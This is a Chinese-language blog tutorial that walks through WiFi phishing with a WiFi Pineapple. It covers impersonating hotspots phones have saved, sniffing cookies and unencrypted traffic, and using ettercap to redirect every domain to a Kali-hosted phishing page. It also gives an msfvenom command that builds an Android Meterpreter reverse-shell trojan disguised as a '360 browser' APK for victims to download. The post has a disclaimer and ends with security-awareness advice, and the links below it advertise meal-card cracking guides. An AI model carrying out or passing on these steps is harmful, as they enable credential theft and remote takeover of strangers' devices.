当前位置:首页 > 未分类 > 正文内容

使用 WifiPineApple 进行范围内 局域网钓鱼

admin7年前 (2018-12-01)未分类280

作者:W22

声明:

仅供参考,勿用于非法用途,否则后果自负,与作者无关。

准备工作:

  1. WifiPineApple,可以在极客之眼的论坛上买一个汉化的。

  1. 两张无线网卡(支持监听模式的功能),推荐 RT3070L,便宜一些;如果有更大需求,可以买功率大一些的。

  1. 一个 USB 集线器,因为 PineApple 上只有一个 USB 接口。

  1. KALI Linux 渗透操作系统。

在进入正题之前,我们需要了解一下 WiFiPineApple 这个设备:

在 WifiPineApple 下有这么一个功能:PineAP,它的功能可谓是强大:可以自动模拟手机曾经连接过的热点,也就是通过手机内的 /data/misc/wifi/wpa_supplicant.conf(存放手机记录的热点名称以及密码)文件,来创建 WiFi 热点的名称,它创建带密码 / 不带密码的 2 种,从而导致,附近的其他用户只要开启了 WiFi,就会自动连接到你的 PineApple 上。

下边说明实验的步骤:

0x01 连接 PineApple:

打开 PineApple,在设备的侧面有一个按钮,推到左侧是开启,右侧是充电宝模式,中间是关机。

**

插入网线或连接建立的热点(一般开机后需要等待 2 分钟左右),使用 web 的方式登陆 PineApple 的默认连接的地址为:http://172.16.42.1:1471

**

输入账号密码登陆(厂商提供默认口令)

我们看到以下的界面:

**

0x02 配置网络(重点):

在左侧的菜单栏中选择网络

**

在网络中我们可以看到当前网卡和 IP 地址获取的情况

**

我们需要做的配置是:一块网卡用于建立 PineAP 热点,一块网卡用于桥接其他网络,连接外网。还有一块网卡用于连接设备物理接口,和默认建立的 wifi (不能动)

最终达到这样的效果

**

0x03 进行一些嗅探和欺骗

PineApple 中有很多的插件,都可以进行对连接上的客户机,做一些 “手脚”,例如图片网址获取的功能,他可以获取到用户访问未被 SSL 加密的图片和一些网址的 URL、请求时提交的数据和 cookie 等。

当然,这些功能在 KALI 内手动进行实现,但是通过这个 web 的方式一键搭建,是不是很方便呢?

**

0x04 通过 KALI 来手动进行 dns 劫持,并且伪造钓鱼网页

  1. 启动 KALI Linux 虚拟机,并设置桥接网卡 我拿自己的有线网卡为例子

菜单栏下的编辑 -> 虚拟网络编辑器,选择使用桥接网卡,并桥接到自己的物理设备 (连接 PineApple 的设备)

**

  1. 配置 ip 地址,或者等待 dhcp 自动分配

  1. 可以 ping 通设备后,我们搭建一个 web 服务器 : service apache2 start

  1. 将钓鱼页面放置 /var/www/html 目录下

  1. 接下来,我们启动 ettercap 来进行 dns 欺骗 :

配置 ettercap 文件:

Vim /etc/Ettercap/etter.dns

**

修改为所有的域名都指向 172.16.42.133 也就是 KALI 的地址

  1. 启动 ettercap  Ettercap -G

Ctrl+U 启动 网卡选择桥接到 PineApple 的网卡

**

管理插件,并将 dns 欺骗功能启用

**

  1. 这时用户访问的未加密的一些网页就会变成你的钓鱼页面,为了测试,做了一个简单的网页,

当然,如果想要更好的效果的话,可以找一个真实性更好的网页进行测试。

**

0x05 通过 msf 生成木马,远控手机或 PC。

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.42.133 LPORT=5555 > ~/360浏览器.apk

放在钓鱼页面上,等待用户 “上钩”.

具体的用法可以参考这篇文章

附上我的几个成功的例子(在被允许的情况下)

**

当然,不止有这些功能,有什么好的想法都可以去尝试一下,不过要适度哦。

0x00 结语

引用我说说里说的话:没有什么是绝对安全的,连接即使是曾经连接过的 wifi 和确定之前连接是安全的 wifi 也是及其危险的,当攻击者伪造出你认为可靠的热点时,你连接了他,可能是主动去连接,也可能是被动去连接 (wifi 一直打开),就会造成信息的泄露,可能会透露你的个人信息:即使现在网络采用了 SSL 技术进行了加密传输,但是还是有相当一部分没有实现这项功能,所以,例如 QQ 号,还有网络浏览的一些信息以及照片,都可能被泄露,不重视网络安全,为了谋取一些利益的同时,忽视手机警告提示,甚至造成更严重的后果!!例如:下载未知绑定了木马的 app 可以被攻击者利用获取短信信息 (验证码)、联系人 (诈骗),甚至摄像头 (威胁),所以要提高安全意识,不要在公共场合轻易的连接 wifi,即使是你认为可靠的。

本萌新技术水平有限,可能有些地方讲的不详细,希望大佬们可以理解一下,欢迎指出错误,随时修正并学习。


扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=56

分享给朋友:

“使用 WifiPineApple 进行范围内 局域网钓鱼” 的相关文章

(原创)还在担心伙食费?学完这个就不用担心啦!【ACR122复制】【饭卡破解】【破解食堂饭卡】【饭卡漏洞】【M1卡破解】

(原创)还在担心伙食费?学完这个就不用担心啦!【ACR122复制】【饭卡破解】【破解食堂饭卡】【饭卡漏洞】【M1卡破解】

(原创)还在担心伙食费?学完这个就不用担心啦!【ACR122复制】【饭卡破解】【破解食堂饭卡】【饭卡漏洞】【M1卡破解】本人小菜一枚,技术不精请多指教~~~~~~~~——————By-5431开始吧!!!!作为集团公司里的一员,享受员工待遇是应该的,入职的时候说好的包吃住,现在呢???自从饭堂承包出...

(原创)校园卡破解系列之权限克隆 [pm3 破解饭卡][pm3 克隆数据][校园卡克隆][IC 卡克隆]

(原创)校园卡破解系列之权限克隆 [pm3 破解饭卡][pm3 克隆数据][校园卡克隆][IC 卡克隆]

一、免责声明本文主张交流与科研学习,请勿对文中提及的内容进行恶意使用!本社团及作者对读者后续的行为不承担任何法律责任。此文章是综合之前饭卡复制、权限提升漏洞后的合并版本,后半部分聚焦饭卡破解;若看过之前文章,可直接跳转至 “(一)饭卡权限提升” 章节。二、基础准备:工具与测试对象1. 核心工具:PM...

(原创)求人不如求己 -- 剪辑音乐就是这么简单 [如何剪辑音乐]

(原创)求人不如求己 -- 剪辑音乐就是这么简单 [如何剪辑音乐]

每每到了学校有活动,需要播放歌曲时,QQ 就多几个好友,消息又 99+,不消问什么事情,就知道是找我剪辑歌曲的同学了。怎么说,我这人对别人提出的需求,都尽力去帮助的,在剪辑音乐这事情上,从没拒绝过,但年复一年,每次剪辑音乐其实很简单,但是量多,就比较影响自己时间了,我又不会拒绝别人,很是尴尬,所以在...

(原创)还在用软件翻墙?看我几秒搞定!

首先说下原理,修改设备 hosts 文件信息,将各大国外网站域名直接指向服务器 ip,绕过国家的 GFW 防火墙,从而可以访问 Google、Facebook、ebay、YouTube、Yahoo、、、太多还是不打了,自己测试-------------------------------------...

(原创)sqlmap 注入初级教程 [sqlmap][sqlmap 指令][sqlmap 怎么用]

(原创)sqlmap 注入初级教程 [sqlmap][sqlmap 指令][sqlmap 怎么用]

一、熟悉 sqlmap 之路:核心注入场景与方法1. Sqlmap 之 Post 注入Post 注入适用于表单提交(如登录页、数据提交页)等场景,核心是通过抓取 Post 请求数据进行注入测试,以下为 4 种常用方法:方法一:基于请求文件(-r 参数)# 基础用法(请求文件与sqlmap同目录)sq...

(原创) 校园卡破解系列之数据修改 [pm3 破解饭卡][pm3 修改数据][校园卡修改][IC 卡修改数据]

(原创) 校园卡破解系列之数据修改 [pm3 破解饭卡][pm3 修改数据][校园卡修改][IC 卡修改数据]

(二)吃不完的饭卡提升完 IC 卡权限,就该考虑能不能修改饭卡金额了。通过两次消费前后饭卡数据的对比分析,发现虽然卡片数据包含较多扇区和区块,但消费前后变化的地方仅涉及两个扇区,这为后续分析提供了便利。通过十六进制与十进制转换,可进一步拆解变化的数据:消费后金额:373.2(数字:37320;16...